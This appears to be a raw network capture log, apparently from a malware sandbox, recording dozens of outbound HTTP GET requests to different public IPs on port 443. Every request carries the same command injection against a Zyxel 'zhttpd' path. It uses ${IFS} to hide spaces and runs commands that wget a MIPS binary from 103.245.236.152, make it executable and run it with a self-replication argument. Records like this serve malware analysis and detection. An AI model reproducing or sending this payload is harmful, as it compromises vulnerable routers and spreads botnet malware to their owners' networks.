                                      Jan 14, 2024 15:50:59.596904993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7588192.168.2.1437520217.44.37.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596956968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7589192.168.2.1451552128.253.163.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597007036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7590192.168.2.143442453.138.11.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597034931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7591192.168.2.1437280212.242.218.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597084045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7592192.168.2.1442456107.173.91.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597111940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7593192.168.2.1460284177.229.200.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597157001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7594192.168.2.145977247.137.18.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597189903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7595192.168.2.1452130176.178.102.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597244978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7596192.168.2.1460930211.22.213.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597291946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7597192.168.2.145707450.170.227.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597315073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7598192.168.2.1439306124.156.248.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597374916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7599192.168.2.143354084.188.238.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597409964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7600192.168.2.1434324173.1.118.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597440958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7601192.168.2.1442726136.144.220.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597505093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7602192.168.2.145441096.213.134.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597527027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7603192.168.2.1457006152.133.238.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597584009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7604192.168.2.146047027.194.251.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597618103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7605192.168.2.1445240179.189.156.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597660065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7606192.168.2.145057038.193.68.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597697973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7607192.168.2.1434774117.149.246.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597742081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7608192.168.2.145306069.155.1.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597776890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7609192.168.2.1460156108.119.205.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597814083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7610192.168.2.143487840.58.203.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597871065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7611192.168.2.143629879.17.144.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597883940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7612192.168.2.1457374203.217.146.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597920895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7613192.168.2.1448246142.78.184.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597974062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7614192.168.2.1446164179.23.209.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.597997904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7615192.168.2.1455404212.109.189.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598074913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7616192.168.2.1436070209.78.210.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598129988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7617192.168.2.1453174189.141.160.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598174095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7618192.168.2.145664473.196.130.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598226070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7619192.168.2.144690877.160.56.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598270893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7620192.168.2.1438700167.89.51.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598308086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7621192.168.2.1457646135.79.132.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598341942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7622192.168.2.143317012.125.217.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598357916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7623192.168.2.1455930109.32.81.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598437071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7624192.168.2.1438064106.206.154.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598520041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7625192.168.2.1440120142.186.47.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598573923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7626192.168.2.14588288.32.197.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598598957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7627192.168.2.1437330143.219.125.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598598957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7628192.168.2.145640698.91.63.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598599911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7629192.168.2.1449788139.228.129.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598628998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7630192.168.2.1456264209.143.25.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598660946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7631192.168.2.1436074119.221.26.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598711014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7632192.168.2.14440501.115.34.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598773003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7633192.168.2.1438938161.161.41.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598803043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7634192.168.2.145834834.93.167.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598834038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7635192.168.2.1450684198.202.28.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598861933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7636192.168.2.144055681.160.126.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598948002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7637192.168.2.1440166212.224.152.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.598959923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7638192.168.2.1453068191.4.90.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599004984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7639192.168.2.1448210178.16.72.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599059105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7640192.168.2.1452732183.210.102.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599087954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7641192.168.2.1450492146.251.150.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599117994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7642192.168.2.1444948145.237.165.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599165916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7643192.168.2.145847066.94.117.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599212885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7644192.168.2.1457024109.168.246.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599251986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7645192.168.2.143750679.59.38.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599304914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7646192.168.2.1443734162.2.155.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599353075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7647192.168.2.1433022145.229.247.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599369049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7648192.168.2.145747267.93.171.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599414110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7649192.168.2.143687884.213.134.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599458933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7650192.168.2.145946034.0.205.125443
                                      TimestampBytes transferredDirectionData
